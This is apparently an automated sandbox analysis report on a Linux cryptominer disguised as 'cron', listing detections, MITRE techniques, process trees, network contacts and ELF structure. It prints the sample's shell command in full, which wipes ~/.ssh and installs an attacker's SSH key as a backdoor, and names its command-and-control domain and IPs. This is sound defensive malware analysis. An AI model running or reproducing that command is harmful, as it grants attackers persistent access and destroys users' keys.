Joe Sandbox Analysis Report: cron

ID: 202041
Sample Name: cron
Cookbook: defaultlinuxfilecookbook.jbs
Time: 02:54:41
Date: 20/01/2020
Version: 28.0.0 Lapis Lazuli


Analysis Report cron

Overview

General Information

Joe Sandbox Version: 28.0.0 Lapis Lazuli
Analysis ID: 202041
Start date: 20.01.2020
Start time: 02:54:41
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 6m 7s
Hypervisor based Inspection enabled: false
Report: light
Sample file name: cron
Cookbook file name: defaultlinuxfilecookbook.jbs
Analysis system description: Ubuntu 16.04 x64 (Kernel 4.4.0-116, Firefox 59.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)
Detection: MAL
Classification: mal76.troj.mine.lin@0/2@4/0

Detection

Strategy Score Range Reporting Whitelisted Threat Detection

Xmrig Threshold 76 0 - 100 false

Classification

[Classification chart: the sample is rated on a malicious / suspicious / clean scale across the categories Ransomware, Miner, Spreading, Evader, Phishing, Exploiter, Banker, Spyware, Trojan / Bot and Adware. The overall label is given under General Information: mal76.troj.mine.lin@0/2@4/0.]

Mitre Att&ck Matrix

Techniques shown in the matrix, grouped by tactic. A number in brackets is the count the report prints next to a matched technique; techniques without a number had no match.

Initial Access: Valid Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: Command-Line Interface [1]; Scripting [1]; Windows Management Instrumentation; Scheduled Task
Persistence: Hidden Files and Directories [1]; Port Monitors; Accessibility Features; System Firmware
Privilege Escalation: Port Monitors; Accessibility Features; Path Interception; DLL Search Order Hijacking
Defense Evasion: Hidden Files and Directories [1]; File and Directory Permissions Modification [1]; Scripting [1]; File Deletion [1]
Credential Access: Credential Dumping; Network Sniffing; Input Capture; Credentials in Files
Discovery: Security Software Discovery [1]; File and Directory Discovery [1]; System Information Discovery [3]; System Network Configuration Discovery
Lateral Movement: Application Deployment Software; Remote Services; Windows Remote Management; Logon Scripts
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture
Exfiltration: Data Compressed; Exfiltration Over Other Network Medium; Automated Exfiltration; Data Encrypted
Command and Control: Standard Non-Application Layer Protocol [1]; Standard Application Layer Protocol [1]; Custom Cryptographic Protocol; Multiband Communication
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups

Signature Overview

• AV Detection
• Bitcoin Miner
• Networking
• System Summary
• Persistence and Installation Behavior
• Malware Analysis System Evasion


AV Detection:

Antivirus detection for sample

Multi AV Scanner detection for submitted file

Bitcoin Miner:

Yara detected Xmrig cryptocurrency miner

Detected Stratum mining protocol

Found related to Crypto-Mining

Reads CPU information from /proc indicative of miner or evasive malware

Reads CPU information from /sys indicative of miner or evasive malware

Networking:

Performs DNS lookups

Urls found in memory or binary data

System Summary:

Sample contains strings that are potentially command strings

Sample has stripped symbol table

Classification label

Persistence and Installation Behavior:

Sample reads /proc/mounts (often used for finding a writable filesystem)

Counts the number of processes currently running

Creates hidden files and/or directories

Executes commands using a shell command-line interpreter

Executes the "chmod" command used to modify permissions

Executes the "mkdir" command used to create folders

Executes the "rm" command used to delete files or directories

Reads system information from the proc file system

Sample tries to set the executable flag

Malware Analysis System Evasion:

Reads CPU information from /proc indicative of miner or evasive malware

Reads CPU information from /sys indicative of miner or evasive malware

Uses the "" system call to query kernel version information (possible evasion)

Malware Configuration

No configs have been found

Runtime Messages

Command: /tmp/cron
Exit Code: 0
Exit Code Info:
Killed: False
Standard Output: [2020-01-20 03:55:23.995] unable to open '/tmp/config.json'.
Standard Error:

Behavior Graph

[Behavior graph for analysis ID 202041; legend node types: Process, Signature, Created File, DNS/IP Info, Is Dropped, Is malicious, Number of created Files, Internet. Information recoverable from the graph:]

Sample: cron
Start date: 20/01/2020
Architecture: LINUX
Score: 76
Signatures attached to the sample: Antivirus detection for sample; Multi AV Scanner detection for submitted file; Yara detected Xmrig cryptocurrency miner; 2 other signatures
Network node: 45.9.148.125, ports 45164 and 80, ASN unknown, label "-package.center", Netherlands, marked malicious; the sample started an Internet connection
Process tree: cron started cron and sh; the cron child carries the signature "Sample reads /proc/mounts (often used for finding a writable filesystem)"; sh started three sh children, which ran rm, mkdir and chmod

Yara Overview

Initial Sample

Source | Rule | Description | Author | Strings
cron | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Sigma Overview

No Sigma rule has matched

Joe Sandbox View / Context

IPs

Match | Associated Sample Name / URL | Detection
45.9.148.125 | cron | malicious
45.9.148.125 | cQLmNrun | malicious

Domains

Match | Associated Sample Name / URL | Detection | Context
debian-package.center | anacron | malicious | 45.9.148.117
debian-package.center | cron | malicious | 45.9.148.129
debian-package.center | cron | malicious | 45.9.148.129

ASN

Match: unknown

JA3 Fingerprints

No context

Dropped Files

No context

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
cron | 41% | Virustotal |
cron | 100% | Avira | LINUX/BitCoinMiner.cgymm

Dropped Files

No Antivirus matches

Domains

Source | Detection | Scanner | Label
debian-package.center | 0% | Virustotal |

URLs

Source | Detection | Scanner | Label
https://xmrig.com/docs/algorithms | 0% | Virustotal |
https://xmrig.com/docs/algorithms | 0% | Avira URL Cloud | safe

Startup

system is lnxubuntu1
cron (PID: 20755, Parent: 20706, MD5: 84945e9ea1950be3e870b798bd7c7559) Arguments: /tmp/cron
    cron New Fork (PID: 20758, Parent: 20755)
    sh (PID: 20758, Parent: 20755, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
        sh New Fork (PID: 20760, Parent: 20758)
        rm (PID: 20760, Parent: 20758, MD5: b79876063d894c449856cca508ecca7f) Arguments: rm -rf .ssh
        sh New Fork (PID: 20762, Parent: 20758)
        mkdir (PID: 20762, Parent: 20758, MD5: a97f666f21c85ec62ea47d022263ef41) Arguments: mkdir .ssh
        sh New Fork (PID: 20768, Parent: 20758)
        chmod (PID: 20768, Parent: 20758, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod -R go= /home/user/.ssh
    cron New Fork (PID: 20772, Parent: 20755)
cleanup

Created / dropped Files

/home/user/.ssh/authorized_keys
Process: /bin/sh
File Type: OpenSSH RSA public key
Size (bytes): 389
Entropy (8bit): 5.91239652812259
Encrypted: false
MD5: A420F7A60A40F3FF3A806A01FEB1DFDA
SHA1: 1AE65132B036DE51BCC62F66B51AE362E11182AF
SHA-256: A8460F446BE540410004B1A8DB4083773FA46F7FE76FA84219C93DAA1669F8F2
SHA-512: 1BA854C321D89441291DA2638D65748FFA06923A63FD2BB9BE8A66440236503FB34E375726A8DA679B55CED51DDA82293FFCFB8BB76563E2DA0071222D3247BF
Malicious: false
Reputation: low
Preview: ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr.

/sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages
Process: /tmp/cron
File Type: ASCII text, with no line terminators
Size (bytes): 6
Entropy (8bit): 1.9182958340544893
Encrypted: false
MD5: 1054DD099E3998ACB4C217F5AE41D8C8
SHA1: 9F649342B81C46321145FB8F13EDD0F61487F1B4
SHA-256: 498A8E5240652961A0C8BCE6BBAB33A705253FF3B4E81403E5CFE3B779263A5A
SHA-512: 03070B43582647A6344B3FFB462DFB4F77814D6ABB77E162A42486B07A13CF0AEBAEB1F2E25003C104808AB9D7ECF6E70EC686C9078F7183BA3E2823216EF4B7
Malicious: false
Reputation: low
Preview: 128129

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
debian-package.center | 45.9.148.117 | true | false | 0%, Virustotal | unknown

URLs from Memory and Binaries

Contacted IPs


Public

IP | Country | ASN | ASN Name | Malicious
45.9.148.125 | Netherlands | 49447 | unknown | true

Static File Info

General

File type: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, stripped
Entropy (8bit): 6.344544956625536
TrID: ELF Executable and Linkable format (Linux) (4029/14) 49.77%; ELF Executable and Linkable format (generic) (4004/1) 49.46%; Lumena CEL bitmap (63/63) 0.78%
File name: cron
File size: 2401096
MD5: 84945e9ea1950be3e870b798bd7c7559
SHA1: 95b4a0e956499b8ea07cd5e880ac7dd2d88131c1
SHA256: fd9007df08c1bd2cf47fb97443c4d7360e204f4d8fe48c5d603373b2b2975708
SHA512: 0b3c5075f9dde4d316aca1d3ba393a4e69288a1af5c05d1b3e309ddefcd653f3e3a5a8dd859a846ad2a5a34b381b34f9809a6e85ded408ec4b1b9c7964ebaabd
SSDEEP: 49152:10cWKu0K8CpxlJWhabW/////////In6C1NdvKODyYGhiDC61N04EXBJDJw5qjURX:+d08xrbW/////////viu6T0lXBJDJwE2
File Content Preview: .ELF...... >...... @...... $...... @.8...@...... V...... V...... `...... `...... `...... 8...... 8...... @.#. ....@.$....

Static ELF Info

ELF header

Class: ELF64
Data: 2's complement, little endian
Version: 1 (current)
Machine: Advanced Micro Devices X86-64
Version Number: 0x1
Type: DYN (Shared object file)
OS/ABI: UNIX - System V
ABI Version: 0
Entry Point Address: 0x195e7
Flags: 0x0
ELF Header Size: 64
Program Header Offset: 64
Program Header Size: 56
Number of Program Headers: 9
Section Header Offset: 2399496
Section Header Size: 64
Number of Section Headers: 25
Header String Table Index: 24

Sections

Name | Type | Address | Offset | Size | EntSize | Flags | Flags Description | Link | Info | Align
(none) | NULL | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | | 0 | 0 | 0
.gnu.hash | GNU_HASH | 0x238 | 0x238 | 0x1c | 0x0 | 0x2 | A | 2 | 0 | 8
.dynsym | DYNSYM | 0x258 | 0x258 | 0x18 | 0x18 | 0x2 | A | 3 | 1 | 8
.dynstr | STRTAB | 0x270 | 0x270 | 0x1 | 0x0 | 0x2 | A | 0 | 0 | 1
.rela.dyn | RELA | 0x278 | 0x278 | 0x15480 | 0x18 | 0x2 | A | 2 | 0 | 8
. | PROGBITS | 0x16000 | 0x16000 | 0xd | 0x0 | 0x6 | AX | 0 | 0 | 1
.plt | PROGBITS | 0x16010 | 0x16010 | 0x90 | 0x10 | 0x6 | AX | 0 | 0 | 16
.text | PROGBITS | 0x160c0 | 0x160c0 | 0x1bba70 | 0x0 | 0x6 | AX | 0 | 0 | 64
.fini | PROGBITS | 0x1d1b30 | 0x1d1b30 | 0x8 | 0x0 | 0x6 | AX | 0 | 0 | 1
.rodata | PROGBITS | 0x1d2000 | 0x1d2000 | 0x1cef0 | 0x0 | 0x2 | A | 0 | 0 | 32
.eh_frame_hdr | PROGBITS | 0x1eeef0 | 0x1eeef0 | 0xc18c | 0x0 | 0x2 | A | 0 | 0 | 4
.eh_frame | PROGBITS | 0x1fb080 | 0x1fb080 | 0x3eb90 | 0x0 | 0x2 | A | 0 | 0 | 8
.gcc_except_table | PROGBITS | 0x239c10 | 0x239c10 | 0x5d08 | 0x0 | 0x2 | A | 0 | 0 | 4
.tbss | NOBITS | 0x240c40 | 0x23fc40 | 0x20 | 0x0 | 0x403 | WAT | 0 | 0 | 8
.init_array | INIT_ARRAY | 0x240c40 | 0x23fc40 | 0x108 | 0x8 | 0x3 | WA | 0 | 0 | 8
.fini_array | FINI_ARRAY | 0x240d48 | 0x23fd48 | 0x18 | 0x8 | 0x3 | WA | 0 | 0 | 8
.ctors | PROGBITS | 0x240d60 | 0x23fd60 | 0x10 | 0x0 | 0x3 | WA | 0 | 0 | 8
.dtors | PROGBITS | 0x240d70 | 0x23fd70 | 0x10 | 0x0 | 0x3 | WA | 0 | 0 | 8
.data.rel.ro | PROGBITS | 0x240d80 | 0x23fd80 | 0x8ed0 | 0x0 | 0x3 | WA | 0 | 0 | 32
.dynamic | DYNAMIC | 0x249c50 | 0x248c50 | 0x190 | 0x10 | 0x3 | WA | 3 | 0 | 8
.got | PROGBITS | 0x249de0 | 0x248de0 | 0x208 | 0x8 | 0x3 | WA | 0 | 0 | 8
.data | PROGBITS | 0x24a000 | 0x249000 | 0xc18 | 0x0 | 0x3 | WA | 0 | 0 | 32
.bss | NOBITS | 0x24ac40 | 0x249c18 | 0xdaa8 | 0x0 | 0x3 | WA | 0 | 0 | 64
.comment | PROGBITS | 0x0 | 0x249c18 | 0x1a | 0x1 | 0x30 | MS | 0 | 0 | 1
.shstrtab | STRTAB | 0x0 | 0x249c32 | 0xd3 | 0x0 | 0x0 | | 0 | 0 | 1

Program Segments

Type | Offset | Virtual Address | Physical Address | File Size | Memory Size | Flags | Flags Description | Align | Prog Interpreter | Section Mappings
LOAD | 0x0 | 0x0 | 0x0 | 0x156f8 | 0x156f8 | 0x4 | R | 0x1000 | | .gnu.hash .dynsym .dynstr .rela.dyn
LOAD | 0x16000 | 0x16000 | 0x16000 | 0x1bbb38 | 0x1bbb38 | 0x5 | R E | 0x1000 | | .init .plt .text .fini
LOAD | 0x1d2000 | 0x1d2000 | 0x1d2000 | 0x6d918 | 0x6d918 | 0x4 | R | 0x1000 | | .rodata .eh_frame_hdr .eh_frame .gcc_except_table
LOAD | 0x23fc40 | 0x240c40 | 0x240c40 | 0x9fd8 | 0x17aa8 | 0x6 | RW | 0x1000 | | .init_array .fini_array .ctors .dtors .data.rel.ro .dynamic .got .data .bss
DYNAMIC | 0x248c50 | 0x249c50 | 0x249c50 | 0x190 | 0x190 | 0x6 | RW | 0x8 | | .dynamic
TLS | 0x23fc40 | 0x240c40 | 0x240c40 | 0x0 | 0x20 | 0x4 | R | 0x8 | |
GNU_EH_FRAME | 0x1eeef0 | 0x1eeef0 | 0x1eeef0 | 0xc18c | 0xc18c | 0x4 | R | 0x4 | | .eh_frame_hdr
GNU_STACK | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | 0x6 | RW | 0x10 | |
GNU_RELRO | 0x23fc40 | 0x240c40 | 0x240c40 | 0x93c0 | 0x93c0 | 0x4 | R | 0x1 | | .init_array .fini_array .ctors .dtors .data.rel.ro .dynamic .got

Dynamic Tags

Type | Meta | Value | Tag
DT_SYMBOLIC | value | 0x0 | 0x10
DT_INIT | value | 0x16000 | 0xc
DT_FINI | value | 0x1d1b30 | 0xd
DT_INIT_ARRAY | value | 0x240c40 | 0x19
DT_INIT_ARRAYSZ | bytes | 264 | 0x1b
DT_FINI_ARRAY | value | 0x240d48 | 0x1a
DT_FINI_ARRAYSZ | bytes | 24 | 0x1c
DT_GNU_HASH | value | 0x238 | 0x6ffffef5
DT_STRTAB | value | 0x270 | 0x5
DT_SYMTAB | value | 0x258 | 0x6
DT_STRSZ | bytes | 1 | 0xa
DT_SYMENT | bytes | 24 | 0xb
DT_DEBUG | value | 0x0 | 0x15
DT_PLTGOT | value | 0x249de0 | 0x3
DT_RELA | value | 0x278 | 0x7
DT_RELASZ | bytes | 87168 | 0x8
DT_RELAENT | bytes | 24 | 0x9
DT_BIND_NOW | value | 0x0 | 0x18
DT_FLAGS_1 | value | 0x8000001 | 0x6ffffffb
DT_RELACOUNT | value | 3632 | 0x6ffffff9
DT_NULL | value | 0x0 | 0x0

Symbols

Symbol Name | Version Info Name | Version Info File Name | Section Name | Value | Size | Symbol Type | Symbol Bind | Visibility | Ndx
| | | .dynsym | 0x0 | 0 | NOTYPE | | DEFAULT | SHN_UNDEF

Network Behavior

Network Port Distribution

Total Packets: 21
• 53 (DNS)
• 80 (HTTP)

TCP Packets

UDP Packets

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jan 20, 2020 02:55:24.767127991 CET | 192.168.2.20 | 8.8.8.8 | 0xe437 | Standard query (0) | debian-package.center | A (IP address) | IN (0x0001)
Jan 20, 2020 02:55:24.771472931 CET | 192.168.2.20 | 8.8.4.4 | 0xe437 | Standard query (0) | debian-package.center | A (IP address) | IN (0x0001)
Jan 20, 2020 02:55:24.771579027 CET | 192.168.2.20 | 8.8.8.8 | 0xe558 | Standard query (0) | debian-package.center | 28 | IN (0x0001)
Jan 20, 2020 02:55:24.771637917 CET | 192.168.2.20 | 8.8.4.4 | 0xe558 | Standard query (0) | debian-package.center | 28 | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jan 20, 2020 02:55:24.792550087 CET | 8.8.8.8 | 192.168.2.20 | 0xe437 | No error (0) | debian-package.center | | 45.9.148.117 | A (IP address) | IN (0x0001)
Jan 20, 2020 02:55:24.792550087 CET | 8.8.8.8 | 192.168.2.20 | 0xe437 | No error (0) | debian-package.center | | 45.9.148.129 | A (IP address) | IN (0x0001)
Jan 20, 2020 02:55:24.792550087 CET | 8.8.8.8 | 192.168.2.20 | 0xe437 | No error (0) | debian-package.center | | 45.9.148.125 | A (IP address) | IN (0x0001)
Jan 20, 2020 02:55:24.796895027 CET | 8.8.4.4 | 192.168.2.20 | 0xe437 | No error (0) | debian-package.center | | 45.9.148.117 | A (IP address) | IN (0x0001)
Jan 20, 2020 02:55:24.796895027 CET | 8.8.4.4 | 192.168.2.20 | 0xe437 | No error (0) | debian-package.center | | 45.9.148.129 | A (IP address) | IN (0x0001)
Jan 20, 2020 02:55:24.796895027 CET | 8.8.4.4 | 192.168.2.20 | 0xe437 | No error (0) | debian-package.center | | 45.9.148.125 | A (IP address) | IN (0x0001)

System Behavior

Analysis Process: cron PID: 20755 Parent PID: 20706

General

Start time: 02:55:23
Start date: 20/01/2020
Path: /tmp/cron
Arguments: /tmp/cron
File size: 2401096 bytes
MD5 hash: 84945e9ea1950be3e870b798bd7c7559

File Activities

File Read

Directory Enumerated

Analysis Process: cron PID: 20758 Parent PID: 20755

General

Start time: 02:55:23
Start date: 20/01/2020
Path: /tmp/cron
Arguments: n/a
File size: 2401096 bytes
MD5 hash: 84945e9ea1950be3e870b798bd7c7559

Analysis Process: sh PID: 20758 Parent PID: 20755

General

Start time: 02:55:23
Start date: 20/01/2020
Path: /bin/sh
Arguments: sh -c "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
File size: 4 bytes
MD5 hash: e02ea3c3450d44126c46d658fa9e654c

File Activities

File Read

File Written

Analysis Process: sh PID: 20760 Parent PID: 20758

General

Start time: 02:55:23
Start date: 20/01/2020
Path: /bin/sh
Arguments: n/a
File size: 4 bytes
MD5 hash: e02ea3c3450d44126c46d658fa9e654c

Analysis Process: rm PID: 20760 Parent PID: 20758

General

Start time: 02:55:23
Start date: 20/01/2020
Path: /bin/rm
Arguments: rm -rf .ssh
File size: 60272 bytes
MD5 hash: b79876063d894c449856cca508ecca7f

File Activities

File Deleted

File Read

Analysis Process: sh PID: 20762 Parent PID: 20758

General

Start time: 02:55:23
Start date: 20/01/2020
Path: /bin/sh
Arguments: n/a
File size: 4 bytes
MD5 hash: e02ea3c3450d44126c46d658fa9e654c

Analysis Process: mkdir PID: 20762 Parent PID: 20758

General

Start time: 02:55:23
Start date: 20/01/2020
Path: /bin/mkdir
Arguments: mkdir .ssh
File size: 76848 bytes
MD5 hash: a97f666f21c85ec62ea47d022263ef41

File Activities

File Read

Directory Created

Analysis Process: sh PID: 20768 Parent PID: 20758

General

Start time: 02:55:23
Start date: 20/01/2020
Path: /bin/sh
Arguments: n/a
File size: 4 bytes
MD5 hash: e02ea3c3450d44126c46d658fa9e654c

Analysis Process: chmod PID: 20768 Parent PID: 20758

General

Start time: 02:55:23
Start date: 20/01/2020
Path: /bin/chmod
Arguments: chmod -R go= /home/user/.ssh
File size: 56112 bytes
MD5 hash: 32c8c7318223ebc5b934a78cfc153d6f

File Activities

File Read

Directory Enumerated

Permission Modified

Analysis Process: cron PID: 20772 Parent PID: 20755

General

Start time: 02:55:23
Start date: 20/01/2020
Path: /tmp/cron
Arguments: n/a
File size: 2401096 bytes
MD5 hash: 84945e9ea1950be3e870b798bd7c7559

File Activities

File Read

File Written
